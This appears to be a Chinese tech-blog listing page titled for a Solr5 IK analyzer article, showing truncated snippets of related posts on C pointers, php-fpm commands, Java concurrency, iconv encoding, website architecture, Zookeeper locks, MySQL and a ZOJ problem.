C语言学习六指针的经典程序，互换两个数字 dcj3sjt126com c
示例程序，swap_1和swap_2都是错误的，推理从1开始推到2，2没完成，推到3就完成了 # include <stdio.h> void swap_1(int, int); void swap_2(int *, int *); void swap_3(int *, int *); int main(void) { int a = 3; int b =
php 5.4中php-fpm 的重启、终止操作命令 dcj3sjt126com PHP
php 5.4中php-fpm 的重启、终止操作命令: 查看php运行目录命令：which php/usr/bin/php 查看php-fpm进程数：ps aux | grep -c php-fpm 查看运行内存/usr/bin/php -i|grep mem 重启php-fpm/etc/init.d/php-fpm restart 在phpinfo()输出内容可以看到php
线程同步工具类 shuizhaosi888 同步工具类
同步工具类包括信号量（Semaphore）、栅栏（barrier）、闭锁（CountDownLatch）闭锁（CountDownLatch） public class RunMain { public long timeTasks(int nThreads, final Runnable task) throws InterruptedException { fin
bleeding edge是什么意思 haojinghua DI
不止一次，看到很多讲技术的文章里面出现过这个词语。今天终于弄懂了——通过朋友给的浏览软件，上了wiki。我再一次感到，没有辞典能像WiKi一样，给出这样体贴人心、一清二楚的解释了。为了表达我对WiKi的喜爱，只好在此一一中英对照，给大家上次课。 In computer science, bleeding edge is a term that
c中实现utf8和gbk的互转 jimmee c iconv utf8&gbk编码
#include <iconv.h> #include <stdlib.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <sys/stat.h> int code_c
大型分布式网站架构设计与实践 lilin530 应用服务器搜索引擎
1.大型网站软件系统的特点？ a.高并发，大流量。 b.高可用。 c.海量数据。 d.用户分布广泛，网络情况复杂。 e.安全环境恶劣。 f.需求快速变更，发布频繁。 g.渐进式发展。 2.大型网站架构演化发展历程？ a.初始阶段的网站架构。应用程序，数据库，文件等所有的资源都在一台服务器上。 b.应用服务器和数据服务器分离。 c.使用缓存改善网站性能。 d.使用应用
在代码中获取Android theme中的attr属性值 OliveExcel android theme
Android的Theme是由各种attr组合而成, 每个attr对应了这个属性的一个引用, 这个引用又可以是各种东西. 在某些情况下, 我们需要获取非自定义的主题下某个属性的内容 (比如拿到系统默认的配色colorAccent), 操作方式举例一则: int defaultColor = 0xFF000000; int[] attrsArray = { andorid.r.
基于Zookeeper的分布式共享锁 roadrunners zookeeper 分布式共享锁
首先，说说我们的场景，订单服务是做成集群的，当两个以上结点同时收到一个相同订单的创建指令，这时并发就产生了，系统就会重复创建订单。等等......场景。这时，分布式共享锁就闪亮登场了。共享锁在同一个进程中是很容易实现的，但在跨进程或者在不同Server之间就不好实现了。Zookeeper就很容易实现。具体的实现原理官网和其它网站也有翻译，这里就不在赘述了。官
两个容易被忽略的MySQL知识 tomcat_oracle mysql
1、varchar(5)可以存储多少个汉字，多少个字母数字？　　相信有好多人应该跟我一样，对这个已经很熟悉了，根据经验我们能很快的做出决定，比如说用varchar(200)去存储url等等，但是，即使你用了很多次也很熟悉了，也有可能对上面的问题做出错误的回答。　　这个问题我查了好多资料，有的人说是可以存储5个字符，2.5个汉字（每个汉字占用两个字节的话），有的人说这个要区分版本，5.0
zoj 3827 Information Entropy(水题) 阿尔萨斯 format
题目链接：zoj 3827 Information Entropy 题目大意：三种底，计算和。解题思路：调用库函数就可以直接算了，不过要注意Pi = 0的时候，不过它题目里居然也讲了。。。limp→0+plogb(p)=0，因为p是logp的高阶。 #include <cstdio> #include <cstring> #include <cmath&

跟益达学Solr5之使用IK分词器

你可能感兴趣的:(Solr,IKAnalyzer)